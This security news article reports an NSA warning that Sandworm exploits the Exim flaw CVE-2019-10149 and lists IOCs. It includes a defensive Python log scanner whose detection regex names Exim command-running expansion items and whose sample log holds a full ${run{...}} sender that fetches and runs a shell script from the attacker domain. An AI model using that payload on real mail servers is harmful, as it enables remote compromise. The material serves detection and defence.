Russian Government Hackers Actively Exploit Exim Mail Server Flaw Since 2019

The US National Security Agency (NSA) issued a security warning on May 28 about an ongoing wave of cyberattacks on mail servers. Since at least August 2019, a threat actor known as Sandworm has been attacking servers that run the Exim Mail Transfer Agent (MTA) software.

It is the same group that interfered in the 2016 US presidential election and unleashed devastating malware the following year. In this campaign the attackers exploit the well-known vulnerability CVE-2019-10149, which allows an unauthenticated remote attacker to execute arbitrary commands on the mail server.

According to security experts, CVE-2019-10149 was publicly disclosed in June 2019, and a fixed Exim release had already been available since February of that year. Even so, the NSA reports that Sandworm has been exploiting unpatched servers since at least August 2019 and is still doing so.

Exim is an MTA (Mail Transfer Agent) that is widely used on Unix-like systems and ships as the default MTA on some Linux distributions, such as Debian. The remote code execution flaw was introduced in Exim version 4.87 and is present in every release up to and including 4.91; it was fixed in version 4.92.

The attackers take advantage of the flaw by sending a specially crafted email to the target server. Exim performs string expansion on parts of the envelope address, so an address that contains an expansion item such as ${run{...}} makes the server execute the embedded command. Once the vulnerability has been exploited, a shell script is downloaded from a domain controlled by the attackers and executed on the compromised system.

In short, the attackers compromise their victims simply by sending a command in the "MAIL FROM" field of an SMTP (Simple Mail Transfer Protocol) session to a public-facing Mail Transfer Agent running a vulnerable Exim version.

The shell script used by this Russian hacking group, which is part of the Main Center for Special Technologies (GTsST) of the General Staff Main Intelligence Directorate (GRU), can do the following on the victim's system:

  • Add new privileged users.
  • Disable network security settings.
  • Update SSH configuration to enable additional remote access.
  • Execute an additional script to enable follow-on exploitation.

Mitigation actions users should follow

  • Apply Exim updates immediately.
  • Detect exploit attempts and unauthorized changes.
  • Apply a defense-in-depth security strategy.

The US National Security Agency strongly recommends that both private and government organizations immediately upgrade their Exim servers to version 4.93 or newer and check for the Indicators of Compromise (IOCs) listed in the NSA security notice.

Here are the IP addresses and the domain that the Sandworm hacking group used in these attacks:

  • 95.216.13.196
  • 103.94.157.5
  • hostapp.be
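The two checks that the NSA's mitigation advice boils down to, checking the installed Exim version and looking for exploit attempts and the listed IOCs in the mail log, are shown below as an added example. This is not code from the NSA notice or from the Exim project. The version ranges are the ones described above (4.87 to 4.91 vulnerable, 4.93 or newer recommended), the IOC values are the ones listed on this page, and the mainlog lines are constructed samples, not real captures. The "${run{" fingerprint is the Exim expansion item an attacker has to plant in the envelope address for CVE-2019-10149 to run a command, so its presence in a sender or recipient address is the clearest sign of an attempt.

```python
import re

# Exim versions carrying CVE-2019-10149: 4.87 up to and including 4.91.
# The fix shipped in 4.92; the NSA notice recommends 4.93 or newer.
VULNERABLE_RANGE = ((4, 87), (4, 91))
RECOMMENDED = (4, 93)

# Indicators listed in the NSA notice and quoted on this page.
IOC_IPS = {"95.216.13.196", "103.94.157.5"}
IOC_DOMAINS = {"hostapp.be"}

# Exim string-expansion items that run commands or read local data.
# A legitimate envelope address never contains "${run{...}}"; seeing one in
# the MAIL FROM or RCPT TO is the fingerprint of a CVE-2019-10149 attempt.
DANGEROUS_EXPANSION = re.compile(
    r"\$\{\s*(run|readsocket|readfile|perl|dlfunc)\b", re.IGNORECASE)

# Exim's mainlog writes the peer address in square brackets, e.g. "[192.0.2.1]".
PEER_IP = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def parse_version(text):
    """Pull MAJOR.MINOR out of a version string or an `exim -bV` banner."""
    m = re.search(r"(\d+)\.(\d+)", text)
    if m is None:
        raise ValueError("no Exim version found in: %r" % text)
    return int(m.group(1)), int(m.group(2))


def classify_version(text):
    """'vulnerable' for 4.87-4.91, 'below-recommended' for any other version
    older than 4.93, otherwise 'ok'."""
    version = parse_version(text)
    low, high = VULNERABLE_RANGE
    if low <= version <= high:
        return "vulnerable"
    if version < RECOMMENDED:
        return "below-recommended"
    return "ok"


def scan_log_line(line):
    """Return the findings for one mainlog line (empty list if it is clean)."""
    findings = []
    if DANGEROUS_EXPANSION.search(line):
        findings.append("expansion-in-address")
    for ip in PEER_IP.findall(line):
        if ip in IOC_IPS:
            findings.append("ioc-ip:" + ip)
    lowered = line.lower()
    for domain in IOC_DOMAINS:
        if domain in lowered:
            findings.append("ioc-domain:" + domain)
    return findings


def scan_log(lines):
    """Map 1-based line number -> findings, only for lines that have any."""
    report = {}
    for number, line in enumerate(lines, start=1):
        hits = scan_log_line(line)
        if hits:
            report[number] = hits
    return report


# Constructed sample mainlog lines (assumed format, not real captures):
# a normal delivery, an exploit attempt carrying a ${run{...}} sender from
# one IOC address, a rejected connection from the other IOC address, and a
# harmless message whose subject contains a "$" but no expansion item.
SAMPLE_LOG = [
    "2020-05-29 10:15:02 1jePdQ-0003Rz-8U <= alice@example.org H=mail.example.org [203.0.113.7] P=esmtps S=2048",
    "2020-05-29 10:16:41 1jePev-0003S3-Kq <= ${run{/bin/sh -c 'wget -O- http://hostapp.be/s | sh'}}@localhost H=(localhost) [95.216.13.196] P=esmtp S=512",
    "2020-05-29 10:17:05 H=(localhost) [103.94.157.5] F=<bob@localhost> rejected RCPT <root@localhost>: relay not permitted",
    "2020-05-29 10:18:30 1jePgc-0003Sa-1x <= ads@example.net H=mx.example.net [198.51.100.9] P=esmtp S=900 T=\"Save $100 today\"",
]

if __name__ == "__main__":
    for banner in ("Exim version 4.89 #1", "Exim version 4.92.3 #2", "4.94.2"):
        print(banner, "->", classify_version(banner))
    for number, hits in scan_log(SAMPLE_LOG).items():
        print("line %d: %s" % (number, ", ".join(hits)))
```

On a real host, feed classify_version() the first line of `exim -bV` and scan_log() the contents of /var/log/exim4/mainlog (Debian) or /var/log/exim/main.log (other distributions). A version in the "vulnerable" class means patching comes before anything else; a hit on the expansion fingerprint from any address, not only the two listed IPs, should be treated as an exploitation attempt, since other actors have used the same flaw.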

Sandworm's activity dates back to the mid-2000s, and the group is believed to be the developer of the BlackEnergy malware used against Ukrainian electricity companies in December 2015; it is also blamed for the follow-on attack that cut power in Kyiv in December 2016.

Security experts also believe the group created NotPetya, the destructive 2017 malware disguised as ransomware that caused billions of dollars in losses worldwide.

BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.